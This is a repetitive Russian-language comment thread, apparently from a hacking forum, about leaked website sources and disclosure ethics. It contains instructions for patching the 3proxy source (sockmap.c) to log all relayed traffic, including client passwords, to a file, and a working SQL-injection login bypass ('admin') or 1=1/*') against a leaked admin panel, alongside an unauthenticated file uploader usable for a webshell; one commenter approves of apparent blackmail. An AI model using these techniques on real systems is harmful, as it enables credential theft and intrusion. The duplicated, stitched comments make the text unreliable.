Ой не надо только тут про всяких блек и вайтхетов… В вашем понимании «нормальный» это тот, кто делает через жопу. а «темный» — кто это видит, но говорить «нормальному» не собирается тчк
Да, несомненно ты молодец, «нормальный», рассказал всем и вся как другой «нормальный» допустил оплошность, благодаря которой «темные» будут творить зло, вместо варианта тихонько отослать мыло техподдержке, либо даже позвонить и промыть моск объяснить ситуацию.
И просто выносит мозг эта ненавязчивая приписка про количество минусов.
3proxy не предусматривает возможности логирования трафика, поэтому нам придется самим немного поправить исходники. Изменения нужно делать в файле sockmap.c, поскольку именно там происходит обмен данными. Начнем с исходящего от сервера трафика. Найди строку «j = recvfrom(param-> remsock, buf, BUFSIZE, 0,…». Эта функция посылает содержимое переменной buf на удаленный сервер. Чтобы контент этой переменной постоянно писался в файл, нужно вставить после этой строки такой код:
*(buf+j)=0;
// открываем файл /tmp/mylog_out для добавления инфы:
my_fp=fopen("/tmp/mylog_out","a");
// пишем в него содержимое переменной buf
fprintf(my_fp,"%s",buf);
// закрываем файл
fclose(my_fp);
Исходящий от клиента трафик, который может содержать важные пассы, записывается аналогичным способом. После строки «res=sendto(param-> remsock, buf + trans, i — trans, 0…» нужно всего-навсего добавить такой код:
мне кажется он вначале предложил им «выкупить» исходники, т.е. если они ему дают бабок, то он не выкладывает их на паблик. шантаж — не жантаж, но нефиг держать криворуких вебкодеров и сисадминов… у америкосов сыграло самолюбие, а гемб молодчик, видимо неплохо им на мозги покапал.
автору стоит серьезно задуматься о «безопасном» коде. потому что в данных сорцах «безопасность» на нуле. смотрел bmw.rar, но не сомневаюсь, что и в остальных тоже самое.
ни одной проверки на то, что кушает скрипт.
admin/index.php
if (isset($_POST['adminname'])) $_SESSION['user'] = $_POST['adminname'];
if (isset($_POST['adminpass'])) $_SESSION['pass'] = $_POST['adminpass'];
...
$res = mysql_query("SELECT name, pass FROM admin WHERE (name='".$_SESSION['user']."' AND pass='".$_SESSION['pass']."')");
login: admin') or 1=1/*
pass: blablalbalblb
и мы в админке.
/admin/uploader/script.php доступен даже без авторизации! причем есть возможность залить любой файл (например, вебшелл).
Да, несомненно ты молодец, «нормальный», рассказал всем и вся как другой «нормальный» допустил оплошность, благодаря которой «темные» будут творить зло, вместо варианта тихонько отослать мыло техподдержке, либо даже позвонить и
промыть москобъяснить ситуацию.И просто выносит мозг эта ненавязчивая приписка про количество минусов.
это что мля? читал, читал, думал счас вот интересное пойдет. вода.
about.php
мне кажется он вначале предложил им «выкупить» исходники, т.е. если они ему дают бабок, то он не выкладывает их на паблик. шантаж — не жантаж, но нефиг держать криворуких вебкодеров и сисадминов… у америкосов сыграло самолюбие, а гемб молодчик, видимо неплохо им на мозги покапал.
ни одной проверки на то, что кушает скрипт.
admin/index.php
login: admin') or 1=1/*
pass: blablalbalblb
и мы в админке.
/admin/uploader/script.php доступен даже без авторизации! причем есть возможность залить любой файл (например, вебшелл).
ну и остальное аналогично-печально.
и т. д…
да и админский пасс в бд хранить в плейн-тексте — это не есть гуд…
именно http://dolboeb.livejournal.com/1355614.html?thread=59367262#t59367262